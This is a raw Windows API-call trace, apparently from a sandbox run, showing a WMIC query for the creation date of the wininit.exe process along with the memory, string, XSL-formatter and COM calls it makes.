[0406.570] free (_Block=0x209040)
[0406.570] malloc (_Size=0x18) returned 0x209040
[0406.570] malloc (_Size=0x18) returned 0x209740
[0406.570] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON20240119140101.223600+060") returned 0x35a
[0406.571] SysStringLen (param_1="") returned 0xa
[0406.571] memcpy (in: _Dst=0x3376a8, _Src=0x336fd8, _Size=0x6b6 | out: _Dst=0x3376a8) returned 0x3376a8
[0406.571] memcpy (in: _Dst=0x337d5c, _Src=0x334be8, _Size=0x16 | out: _Dst=0x337d5c) returned 0x337d5c
[0406.571] free (_Block=0x209560)
[0406.571] free (_Block=0x209040)
[0406.571] GetCurrentThreadId () returned 0xdf0
[0406.571] ??0CHString@@QEAA@PEBG@Z () returned 0x16f6a8
[0406.571] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x16f6a8
[0406.571] lstrlenW (lpString="LIST") returned 4
[0406.571] lstrlenW (lpString="get") returned 3
[0406.572] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1
[0406.572] lstrlenW (lpString="ASSOC") returned 5
[0406.572] lstrlenW (lpString="get") returned 3
[0406.572] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="ASSOC", cchCount2=5) returned 3
[0406.572] lstrlenW (lpString="GET") returned 3
[0406.572] lstrlenW (lpString="get") returned 3
[0406.572] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0406.572] malloc (_Size=0x20a) returned 0x20d710
[0406.572] GetSystemDirectoryW (in: lpBuffer=0x20d710, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0406.572] free (_Block=0x20d710)
[0406.573] malloc (_Size=0x18) returned 0x209040
[0406.573] malloc (_Size=0x18) returned 0x209560
[0406.573] malloc (_Size=0x18) returned 0x209580
[0406.573] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
[0406.573] SysStringLen (param_1="\\wbem\\") returned 0x6
[0406.573] memcpy (in: _Dst=0x2c68b8, _Src=0x2c62c8, _Size=0x28 | out: _Dst=0x2c68b8) returned 0x2c68b8
[0406.573] memcpy (in: _Dst=0x2c68de, _Src=0x334be8, _Size=0xe | out: _Dst=0x2c68de) returned 0x2c68de
[0406.573] free (_Block=0x209040)
[0406.573] free (_Block=0x209560)
[0406.573] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32
[0406.574] free (_Block=0x209580)
[0406.574] malloc (_Size=0x18) returned 0x209580
[0406.574] malloc (_Size=0x18) returned 0x209560
[0406.574] malloc (_Size=0x18) returned 0x209040
[0406.574] malloc (_Size=0x18) returned 0x2095a0
[0406.574] malloc (_Size=0x18) returned 0x209680
[0406.574] malloc (_Size=0x18) returned 0x209720
[0406.574] lstrlenW (lpString="TABLE") returned 5
[0406.574] lstrlenW (lpString="CSV") returned 3
[0406.575] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CSV", cchCount1=3, lpString2="TABLE", cchCount2=5) returned 1
[0406.575] lstrlenW (lpString="TABLE") returned 5
[0406.575] lstrlenW (lpString="HFORM") returned 5
[0406.575] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HFORM", cchCount1=5, lpString2="TABLE", cchCount2=5) returned 1
[0406.575] lstrlenW (lpString="TABLE") returned 5
[0406.575] lstrlenW (lpString="HTABLE") returned 6
[0406.575] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HTABLE", cchCount1=6, lpString2="TABLE", cchCount2=5) returned 1
[0406.575] lstrlenW (lpString="TABLE") returned 5
[0406.575] lstrlenW (lpString="LIST") returned 4
[0406.575] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LIST", cchCount1=4, lpString2="TABLE", cchCount2=5) returned 1
[0406.575] lstrlenW (lpString="TABLE") returned 5
[0406.575] lstrlenW (lpString="MOF") returned 3
[0406.575] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MOF", cchCount1=3, lpString2="TABLE", cchCount2=5) returned 1
[0406.575] lstrlenW (lpString="TABLE") returned 5
[0406.576] lstrlenW (lpString="RAWXML") returned 6
[0406.576] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="RAWXML", cchCount1=6, lpString2="TABLE", cchCount2=5) returned 1
[0406.576] lstrlenW (lpString="TABLE") returned 5
[0406.576] lstrlenW (lpString="TABLE") returned 5
[0406.576] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="TABLE", cchCount1=5, lpString2="TABLE", cchCount2=5) returned 2
[0406.576] SysStringLen (param_1="texttable.xsl") returned 0xd
[0406.576] SysStringLen (param_1="hform.xsl") returned 0x9
[0406.576] SysStringLen (param_1="texttable.xsl") returned 0xd
[0406.576] SysStringLen (param_1="htable.xsl") returned 0xa
[0406.576] SysStringLen (param_1="texttable.xsl") returned 0xd
[0406.576] SysStringLen (param_1="csv.xsl") returned 0x7
[0406.576] SysStringLen (param_1="texttable.xsl") returned 0xd
[0406.576] SysStringLen (param_1="mof.xsl") returned 0x7
[0406.576] SysStringLen (param_1="texttable.xsl") returned 0xd
[0406.576] SysStringLen (param_1="xml.xsl") returned 0x7
[0406.576] malloc (_Size=0x18) returned 0x209780
[0406.577] malloc (_Size=0x18) returned 0x209640
[0406.577] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19
[0406.577] SysStringLen (param_1="\\") returned 0x1
[0406.577] memcpy (in: _Dst=0x2c68b8, _Src=0x2c62c8, _Size=0x34 | out: _Dst=0x2c68b8) returned 0x2c68b8
[0406.577] memcpy (in: _Dst=0x2c68ea, _Src=0x334c48, _Size=0x4 | out: _Dst=0x2c68ea) returned 0x2c68ea
[0406.577] free (_Block=0x209780)
[0406.577] malloc (_Size=0x18) returned 0x209780
[0406.577] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\\\") returned 0x1a
[0406.577] SysStringLen (param_1="texttable.xsl") returned 0xd
[0406.577] memcpy (in: _Dst=0x2ee888, _Src=0x2c68b8, _Size=0x36 | out: _Dst=0x2ee888) returned 0x2ee888
[0406.578] memcpy (in: _Dst=0x2ee8bc, _Src=0x2566c8, _Size=0x1c | out: _Dst=0x2ee8bc) returned 0x2ee8bc
[0406.578] free (_Block=0x209640)
[0406.578] CreateFileW (lpFileName="C:\\Windows\\system32\\wbem\\\\texttable.xsl" (normalized: "c:\\windows\\system32\\wbem\\texttable.xsl"), dwDesiredAccess=0x0, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c
[0406.578] CloseHandle (hObject=0x26c) returned 1
[0406.578] malloc (_Size=0x30) returned 0x2086c0
[0406.579] malloc (_Size=0x30) returned 0x208700
[0406.579] ??0CHString@@QEAA@PEBG@Z () returned 0x16f408
[0406.579] ?Right@CHString@@QEBA?AV1@H@Z () returned 0x16f400
[0406.579] ??0CHString@@QEAA@PEBG@Z () returned 0x16f458
[0406.579] _wcsicmp (_String1=".xsl", _String2=".xsl") returned 0
[0406.579] ??1CHString@@QEAA@XZ () returned 0x1
[0406.579] ??1CHString@@QEAA@XZ () returned 0x20015c007c0001
[0406.579] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0406.579] malloc (_Size=0x30) returned 0x208740
[0406.579] malloc (_Size=0x20) returned 0x20ceb0
[0406.579] malloc (_Size=0x30) returned 0x208780
[0406.580] free (_Block=0x208740)
[0406.580] free (_Block=0x208700)
[0406.580] free (_Block=0x2086c0)
[0406.580] free (_Block=0x209720)
[0406.580] free (_Block=0x209680)
[0406.580] free (_Block=0x2095a0)
[0406.580] free (_Block=0x209040)
[0406.580] free (_Block=0x209560)
[0406.580] free (_Block=0x209580)
[0406.580] GetCurrentThreadId () returned 0xdf0
[0406.581] ??0CHString@@QEAA@XZ () returned 0x16f4b0
[0406.581] CoCreateInstance (in: rclsid=0xffa37410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffa373f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xffaa29e8 | out: ppv=0xffaa29e8*=0x21371d0) returned 0x0
[0406.584] FreeThreadedDOMDocument:IXMLDOMDocument:loadXML (in: This=0x21371d0, bstrXML=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON20240119140101.223600+060", isSuccessful=0x16f494 | out: isSuccessful=0x16f494*=0xffff) returned 0x0
[0406.589] ??0CHString@@QEAA@XZ () returned 0x16f190
[0406.589] GetCurrentThreadId () returned 0xdf0
[0406.590] malloc (_Size=0x20) returned 0x20cee0
[0406.590] malloc (_Size=0x30) returned 0x2086c0
[0406.590] CoCreateInstance (in: rclsid=0xffa37420*(Data1=0x2933bf94, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), pUnkOuter=0x0, dwClsContext=0x15, riid=0xffa37400*(Data1=0x2933bf93, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x16f1a8 | out: ppv=0x16f1a8*=0x2137620) returned 0x0
[0406.600] CoCreateInstance (in: rclsid=0xffa37410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x15, riid=0xffa373f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x16f1c0 | out: ppv=0x16f1c0*=0x213b330) returned 0x0
[0406.601] FreeThreadedDOMDocument:IXMLDOMDocument:put_async (This=0x213b330, async=0) returned 0x0
[0406.601] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\\\texttable.xsl") returned 0x4e
[0406.601] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x213b330, xmlSource=0x16f360*(varType=0x8, wReserved1=0x213, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\\\texttable.xsl", varVal2=0x0), isSuccessful=0x16f458 | out: isSuccessful=0x16f458*=0xffff) returned 0x0
[0406.608] XSLTemplate:IXSLTemplate:putref_stylesheet (This=0x2137620, stylesheet=0x213b330) returned 0x0
[0406.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16cfa0 | out: lpSystemTimeAsFileTime=0x16cfa0*(dwLowDateTime=0xa10cd60, dwHighDateTime=0x1dab599))
[0406.641] GetCurrentProcessId () returned 0xdec
[0406.641] GetCurrentThreadId () returned 0xdf0
[0406.641] GetTickCount () returned 0x142f311
[0406.641] QueryPerformanceCounter (in: lpPerformanceCount=0x16cfa8 | out: lpPerformanceCount=0x16cfa8*=2129397410358) returned 1
[0406.663] malloc (_Size=0x100) returned 0x20a7f0
[0406.664] __dllonexit () returned 0x7fef4afbfc0
[0406.664] __dllonexit () returned 0x7fef4afbfa8
[0406.664] __dllonexit () returned 0x7fef4afbfd4
[0406.666] GetUserDefaultLCID () returned 0x409
[0406.666] GetVersion () returned 0x1db10106
[0406.667] ??2@YAPEAX_K@Z () returned 0x20d710
[0406.668] ??2@YAPEAX_K@Z () returned 0x20e240
[0406.668] GetUserDefaultLCID () returned 0x409
[0406.669] GetACP () returned 0x4e4
[0406.669] ??3@YAXPEAX@Z () returned 0x55f9f701
[0406.672] GetCurrentThreadId () returned 0xdf0
[0406.672] ??2@YAPEAX_K@Z () returned 0x20d710
[0406.672] GetCurrentThreadId () returned 0xdf0
[0406.672] ??2@YAPEAX_K@Z () returned 0x20cf10
[0406.672] ??2@YAPEAX_K@Z () returned 0x208700
[0406.672] ??2@YAPEAX_K@Z () returned 0x20d7f0
[0406.672] ??2@YAPEAX_K@Z () returned 0x208740
[0406.673] GetCurrentThreadId () returned 0xdf0
[0406.673] ??2@YAPEAX_K@Z () returned 0x20d8c0
[0406.673] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0406.674] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x16ecb0, cchData=6 | out: lpLCData="1252") returned 5
[0406.674] IsValidCodePage (CodePage=0x4e4) returned 1
[0406.675] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefdf10000
[0406.676] GetProcAddress (hModule=0x7fefdf10000, lpProcName="CoCreateInstance") returned 0x7fefdf37490
[0406.676] CoCreateInstance (in: rclsid=0x7fef4b4d5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef4b4d5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x20e588 | out: ppv=0x20e588*=0x2d91c0) returned 0x0
[0406.677] IUnknown:AddRef (This=0x2d91c0) returned 0x2
[0406.677] GetCurrentProcessId () returned 0xdec
[0406.677] GetCurrentThreadId () returned 0xdf0
[0406.677] GetTickCount () returned 0x142f340
[0406.677] ISystemDebugEventFire:BeginSession (This=0x2d91c0, guidSourceID=0x7fef4b4d5d8, strSessionName="VBScript:00003564:00003568:21164864") returned 0x0
[0406.677] DllRegisterServer () returned 0x0
[0406.678] GetCurrentThreadId () returned 0xdf0
[0406.678] realloc (_Block=0x0, _Size=0xc8) returned 0x20d950
[0406.678] memcpy (in: _Dst=0x20d950, _Src=0x7fef4b60800, _Size=0x10 | out: _Dst=0x20d950) returned 0x20d950
[0406.679] memcpy (in: _Dst=0x20d960, _Src=0x7fef4b4f2c8, _Size=0x6 | out: _Dst=0x20d960) returned 0x20d960
[0406.679] memcpy (in: _Dst=0x20d966, _Src=0x7fef4b4f2d0, _Size=0x18 | out: _Dst=0x20d966) returned 0x20d966
[0406.679] ??2@YAPEAX_K@Z () returned 0x2087c0
[0406.679] malloc (_Size=0x1008) returned 0x20e5d0
[0406.679] ??2@YAPEAX_K@Z () returned 0x20f5e0
[0406.680] malloc (_Size=0x400) returned 0x20f770
[0406.680] malloc (_Size=0x108) returned 0x20a900
[0406.680] malloc (_Size=0x2008) returned 0x34dfd0
[0406.681] memcpy (in: _Dst=0x34e004, _Src=0x2146d12, _Size=0xc | out: _Dst=0x34e004) returned 0x34e004
[0406.681] memcpy (in: _Dst=0x34e044, _Src=0x2146d20, _Size=0x10 | out: _Dst=0x34e044) returned 0x34e044
[0406.681] memcpy (in: _Dst=0x34e08c, _Src=0x2146e30, _Size=0x6 | out: _Dst=0x34e08c) returned 0x34e08c
[0406.681] memcpy (in: _Dst=0x34e0c4, _Src=0x2146e38, _Size=0xa | out: _Dst=0x34e0c4) returned 0x34e0c4
[0406.681] memcpy (in: _Dst=0x34e104, _Src=0x2146e4c, _Size=0x10 | out: _Dst=0x34e104) returned 0x34e104
[0406.682] memcpy (in: _Dst=0x34e14c, _Src=0x2146e70, _Size=0xc | out: _Dst=0x34e14c) returned 0x34e14c
[0406.682] malloc (_Size=0x208) returned 0x20fb80
[0406.682] memcpy (in: _Dst=0x34e18c, _Src=0x2146e90, _Size=0x4 | out: _Dst=0x34e18c) returned 0x34e18c
[0406.682] memcpy (in: _Dst=0x34e1c4, _Src=0x2146ea8, _Size=0xa | out: _Dst=0x34e1c4) returned 0x34e1c4
[0406.682] memcpy (in: _Dst=0x34e204, _Src=0x2146ebc, _Size=0x10 | out: _Dst=0x34e204) returned 0x34e204
[0406.682] memcpy (in: _Dst=0x34e24c, _Src=0x2146ed6, _Size=0x12 | out: _Dst=0x34e24c) returned 0x34e24c
[0406.682] malloc (_Size=0x408) returned 0x34ffe0
[0406.683] memcpy (in: _Dst=0x34e294, _Src=0x2146f08, _Size=0x8 | out: _Dst=0x34e294) returned 0x34e294
[0406.683] memcpy (in: _Dst=0x34e2d4, _Src=0x2146f30, _Size=0x18 | out: _Dst=0x34e2d4) returned 0x34e2d4
[0406.683] memcpy (in: _Dst=0x34e324, _Src=0x2146f4a, _Size=0x10 | out: _Dst=0x34e324) returned 0x34e324
[0406.683] memcpy (in: _Dst=0x34e36c, _Src=0x2146f5c, _Size=0x18 | out: _Dst=0x34e36c) returned 0x34e36c
[0406.683] memcpy (in: _Dst=0x34e3bc, _Src=0x2146f76, _Size=0x2 | out: _Dst=0x34e3bc) returned 0x34e3bc
[0406.684] memcpy (in: _Dst=0x34e3f4, _Src=0x2146fc4, _Size=0x6 | out: _Dst=0x34e3f4) returned 0x34e3f4
[0406.684] malloc (_Size=0x808) returned 0x3503f0
[0406.684] memcpy (in: _Dst=0x34e42c, _Src=0x2146ff0, _Size=0xa | out: _Dst=0x34e42c) returned 0x34e42c
[0406.684] memcpy (in: _Dst=0x34e46c, _Src=0x2146ffc, _Size=0x8 | out: _Dst=0x34e46c) returned 0x34e46c
[0406.684] memcpy (in: _Dst=0x34e4ac, _Src=0x2147018, _Size=0x2 | out: _Dst=0x34e4ac) returned 0x34e4ac
[0406.684] memcpy (in: _Dst=0x34e4e4, _Src=0x214702c, _Size=0x8 | out: _Dst=0x34e4e4) returned 0x34e4e4
[0406.685] memcpy (in: _Dst=0x34e524, _Src=0x20f64c, _Size=0x20 | out: _Dst=0x34e524) returned 0x34e524
[0406.685] memcpy (in: _Dst=0x34e57c, _Src=0x214709c, _Size=0xa | out: _Dst=0x34e57c) returned 0x34e57c
[0406.685] memcpy (in: _Dst=0x34e5bc, _Src=0x21470b2, _Size=0x6 | out: _Dst=0x34e5bc) returned 0x34e5bc
[0406.686] memcpy (in: _Dst=0x34e5f4, _Src=0x21470f8, _Size=0x8 | out: _Dst=0x34e5f4) returned 0x34e5f4
[0406.686] memcpy (in: _Dst=0x34e634, _Src=0x214711a, _Size=0x8 | out: _Dst=0x34e634) returned 0x34e634
[0406.686] memcpy (in: _Dst=0x34e674, _Src=0x2147162, _Size=0x16 | out: _Dst=0x34e674) returned 0x34e674
[0406.687] malloc (_Size=0x1008) returned 0x350c00
[0406.687] memcpy (in: _Dst=0x34e6bc, _Src=0x2147218, _Size=0x12 | out: _Dst=0x34e6bc) returned 0x34e6bc
[0406.687] memcpy (in: _Dst=0x34e704, _Src=0x2147242, _Size=0xa | out: _Dst=0x34e704) returned 0x34e704
[0406.687] memcpy (in: _Dst=0x34e744, _Src=0x2147250, _Size=0x8 | out: _Dst=0x34e744) returned 0x34e744
[0406.687] memcpy (in: _Dst=0x34e784, _Src=0x2147262, _Size=0xe | out: _Dst=0x34e784) returned 0x34e784
[0406.687] memcpy (in: _Dst=0x34e7c4, _Src=0x214727a, _Size=0x4 | out: _Dst=0x34e7c4) returned 0x34e7c4
[0406.688] memcpy (in: _Dst=0x34e7fc, _Src=0x2147292, _Size=0x8 | out: _Dst=0x34e7fc) returned 0x34e7fc
[0406.688] memcpy (in: _Dst=0x34e83c, _Src=0x2147338, _Size=0x4 | out: _Dst=0x34e83c) returned 0x34e83c
[0406.689] memcpy (in: _Dst=0x34e874, _Src=0x214733e, _Size=0x14 | out: _Dst=0x34e874) returned 0x34e874
[0406.689] memcpy (in: _Dst=0x34e8bc, _Src=0x2147354, _Size=0x18 | out: _Dst=0x34e8bc) returned 0x34e8bc
[0406.689] memcpy (in: _Dst=0x34e90c, _Src=0x20f64c, _Size=0x8 | out: _Dst=0x34e90c) returned 0x34e90c
[0406.689] memcpy (in: _Dst=0x34e94c, _Src=0x214737e, _Size=0xa | out: _Dst=0x34e94c) returned 0x34e94c
[0406.689] memcpy (in: _Dst=0x34e98c, _Src=0x2147392, _Size=0x8 | out: _Dst=0x34e98c) returned 0x34e98c
[0406.690] memcpy (in: _Dst=0x34e9cc, _Src=0x2147502, _Size=0xe | out: _Dst=0x34e9cc) returned 0x34e9cc
[0406.690] memcpy (in: _Dst=0x34ea0c, _Src=0x2147518, _Size=0x10 | out: _Dst=0x34ea0c) returned 0x34ea0c
[0406.690] memcpy (in: _Dst=0x34ea54, _Src=0x20f64c, _Size=0x1c | out: _Dst=0x34ea54) returned 0x34ea54
[0406.691] memcpy (in: _Dst=0x34eaa4, _Src=0x2147574, _Size=0x1a | out: _Dst=0x34eaa4) returned 0x34eaa4
[0406.691] memcpy (in: _Dst=0x34eaf4, _Src=0x20f64c, _Size=0x2 | out: _Dst=0x34eaf4) returned 0x34eaf4
[0406.691] memcpy (in: _Dst=0x34eb2c, _Src=0x21475f2, _Size=0x14 | out: _Dst=0x34eb2c) returned 0x34eb2c
[0406.691] memcpy (in: _Dst=0x34eb74, _Src=0x2147608, _Size=0x14 | out: _Dst=0x34eb74) returned 0x34eb74
[0406.691] memcpy (in: _Dst=0x34ebbc, _Src=0x214761e, _Size=0xc | out: _Dst=0x34ebbc) returned 0x34ebbc
[0406.692] memcpy (in: _Dst=0x34ebfc, _Src=0x20f64c, _Size=0x8 | out: _Dst=0x34ebfc) returned 0x34ebfc
[0406.692] memcpy (in: _Dst=0x34ec3c, _Src=0x214769a, _Size=0x12 | out: _Dst=0x34ec3c) returned 0x34ec3c
[0406.692] memcpy (in: _Dst=0x34ec84, _Src=0x21476b2, _Size=0x6 | out: _Dst=0x34ec84) returned 0x34ec84
[0406.692] memcpy (in: _Dst=0x34ecbc, _Src=0x21476ba, _Size=0x8 | out: _Dst=0x34ecbc) returned 0x34ecbc
[0406.692] memcpy (in: _Dst=0x34ecfc, _Src=0x21476d0, _Size=0x4 | out: _Dst=0x34ecfc) returned 0x34ecfc
[0406.692] memcpy (in: _Dst=0x34ed34, _Src=0x20f64c, _Size=0xc | out: _Dst=0x34ed34) returned 0x34ed34
[0406.693] memcpy (in: _Dst=0x34ed74, _Src=0x20f64c, _Size=0x2 | out: _Dst=0x34ed74) returned 0x34ed74
[0406.693] malloc (_Size=0x2008) returned 0x351c10
[0406.693] memcpy (in: _Dst=0x34edac, _Src=0x21477e0, _Size=0x1c | out: _Dst=0x34edac) returned 0x34edac
[0406.693] memcpy (in: _Dst=0x34edfc, _Src=0x2147818, _Size=0xc | out: _Dst=0x34edfc) returned 0x34edfc
[0406.694] memcpy (in: _Dst=0x34ee3c, _Src=0x20f64c, _Size=0xc | out: _Dst=0x34ee3c) returned 0x34ee3c
[0406.694] memcpy (in: _Dst=0x34ee7c, _Src=0x20f64c, _Size=0x2 | out: _Dst=0x34ee7c) returned 0x34ee7c
[0406.696] memcpy (in: _Dst=0x34eeb4, _Src=0x20f64c, _Size=0x4 | out: _Dst=0x34eeb4) returned 0x34eeb4
[0406.696] memcpy (in: _Dst=0x34eeec, _Src=0x2147ae0, _Size=0x8 | out: _Dst=0x34eeec) returned 0x34eeec
[0406.697] memcpy (in: _Dst=0x34ef2c, _Src=0x20f64c, _Size=0x2 | out: _Dst=0x34ef2c) returned 0x34ef2c
[0406.697] memcpy (in: _Dst=0x34ef64, _Src=0x20f64c, _Size=0x24 | out: _Dst=0x34ef64) returned 0x34ef64
[0406.697] memcpy (in: _Dst=0x34efbc, _Src=0x2147bf4, _Size=0xc | out: _Dst=0x34efbc) returned 0x34efbc
[0406.697] memcpy (in: _Dst=0x34effc, _Src=0x2147c04, _Size=0x8 | out: _Dst=0x34effc) returned 0x34effc
[0406.697] memcpy (in: _Dst=0x34f03c, _Src=0x2147c10, _Size=0x10 | out: _Dst=0x34f03c) returned 0x34f03c
[0406.698] memcpy (in: _Dst=0x34f084, _Src=0x2147c24, _Size=0x1c | out: _Dst=0x34f084) returned 0x34f084
[0406.698] memcpy (in: _Dst=0x34f0d4, _Src=0x2147c44, _Size=0x1a | out: _Dst=0x34f0d4) returned 0x34f0d4
[0406.698] memcpy (in: _Dst=0x34f124, _Src=0x2147c62, _Size=0x16 | out: _Dst=0x34f124) returned 0x34f124
[0406.698] memcpy (in: _Dst=0x34f16c, _Src=0x2147c7c, _Size=0x14 | out: _Dst=0x34f16c) returned 0x34f16c
[0406.698] memcpy (in: _Dst=0x34f1b4, _Src=0x2147cc0, _Size=0x16 | out: _Dst=0x34f1b4) returned 0x34f1b4
[0406.698] memcpy (in: _Dst=0x34f1fc, _Src=0x20f64c, _Size=0x1e | out: _Dst=0x34f1fc) returned 0x34f1fc
[0406.698] memcpy (in: _Dst=0x34f24c, _Src=0x20f64c, _Size=0x20 | out: _Dst=0x34f24c) returned 0x34f24c
[0406.698] memcpy (in: _Dst=0x34f2a4, _Src=0x2147d78, _Size=0x6 | out: _Dst=0x34f2a4) returned 0x34f2a4
[0406.699] memcpy (in: _Dst=0x34f2dc, _Src=0x2147da0, _Size=0x20 | out: _Dst=0x34f2dc) returned 0x34f2dc
[0406.699] memcpy (in: _Dst=0x34f334, _Src=0x20f64c, _Size=0x8 | out: _Dst=0x34f334) returned 0x34f334
[0406.699] memcpy (in: _Dst=0x34f374, _Src=0x2147dde, _Size=0x6 | out: _Dst=0x34f374) returned 0x34f374
[0406.699] memcpy (in: _Dst=0x34f3ac, _Src=0x2147df8, _Size=0x4 | out: _Dst=0x34f3ac) returned 0x34f3ac
[0406.699] memcpy (in: _Dst=0x34f3e4, _Src=0x2147dfe, _Size=0xe | out: _Dst=0x34f3e4) returned 0x34f3e4
[0406.700] memcpy (in: _Dst=0x34f424, _Src=0x20f64c, _Size=0x4 | out: _Dst=0x34f424) returned 0x34f424
[0406.700] memcpy (in: _Dst=0x34f45c, _Src=0x2147e72, _Size=0x8 | out: _Dst=0x34f45c) returned 0x34f45c
[0406.700] memcpy (in: _Dst=0x34f49c, _Src=0x20f64c, _Size=0x24 | out: _Dst=0x34f49c) returned 0x34f49c
[0406.701] memcpy (in: _Dst=0x34f4f4, _Src=0x20f64c, _Size=0x12 | out: _Dst=0x34f4f4) returned 0x34f4f4
[0406.701] memcpy (in: _Dst=0x34f53c, _Src=0x20f64c, _Size=0x2 | out: _Dst=0x34f53c) returned 0x34f53c
[0406.702] memcpy (in: _Dst=0x34f574, _Src=0x20f64c, _Size=0x2 | out: _Dst=0x34f574) returned 0x34f574
[0406.702] memcpy (in: _Dst=0x34f5ac, _Src=0x20f64c, _Size=0x1e | out: _Dst=0x34f5ac) returned 0x34f5ac
[0406.703] memcpy (in: _Dst=0x34f5fc, _Src=0x20f64c, _Size=0x12 | out: _Dst=0x34f5fc) returned 0x34f5fc
[0406.703] malloc (_Size=0x4008) returned 0x353c20
[0406.703] memcpy (in: _Dst=0x34f644, _Src=0x20f64c, _Size=0x14 | out: _Dst=0x34f644) returned 0x34f644
[0406.705] memcpy (in: _Dst=0x34f68c, _Src=0x20f64c, _Size=0x2 | out: _Dst=0x34f68c) returned 0x34f68c
[0406.706] free (_Block=0x34dfd0)
[0406.706] free (_Block=0x20e5d0)
[0406.706] ??3@YAXPEAX@Z () returned 0x74007400820001
[0406.706] free (_Block=0x20f770)
[0406.707] free (_Block=0x35bf70)
[0406.707] free (_Block=0x357f60)
[0406.707] free (_Block=0x353c20)
[0406.707] free (_Block=0x351c10)
[0406.707] free (_Block=0x350c00)
[0406.707] free (_Block=0x3503f0)
[0406.707] free (_Block=0x34ffe0)
[0406.707] free (_Block=0x20fb80)
[0406.707] free (_Block=0x20a900)
[0406.707] ??2@YAPEAX_K@Z () returned 0x20e5d0
[0406.707] ??2@YAPEAX_K@Z () returned 0x20cf40
[0406.707] malloc (_Size=0x10) returned 0x209560
[0406.708] memcpy (in: _Dst=0x209560, _Src=0x16ebe0, _Size=0x10 | out: _Dst=0x209560) returned 0x209560
[0406.708] free (_Block=0x20d950)
[0406.709] GetUserDefaultLCID () returned 0x409
[0406.709] GetACP () returned 0x4e4
[0406.709] ??3@YAXPEAX@Z () returned 0x740075007e0001
[0406.709] ISystemDebugEventFire:EndSession (This=0x2d91c0) returned 0x0
[0406.709] IUnknown:Release (This=0x2d91c0) returned 0x1
[0406.710] ??3@YAXPEAX@Z () returned 0x55f9f701
[0406.710] ??3@YAXPEAX@Z () returned 0x55f9f701
[0406.710] IUnknown:Release (This=0x2d91c0) returned 0x0
[0406.710] DllRegisterServer () returned 0x0
[0406.711] XSLTemplate:IXSLTemplate:createProcessor (in: This=0x2137620, ppProcessor=0x16f1a0 | out: ppProcessor=0x16f1a0*=0x2139640) returned 0x0
[0406.711] FreeThreadedDOMDocument:IUnknown:AddRef (This=0x21371d0) returned 0x2
[0406.711] IXSLProcessor:put_input (This=0x2139640, input=0x16f3e0*(varType=0x9, wReserved1=0xf43b, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x21371d0, varVal2=0x1)) returned 0x0
[0406.712] GetStdHandle (nStdHandle=0xfffffff5) returned 0x60
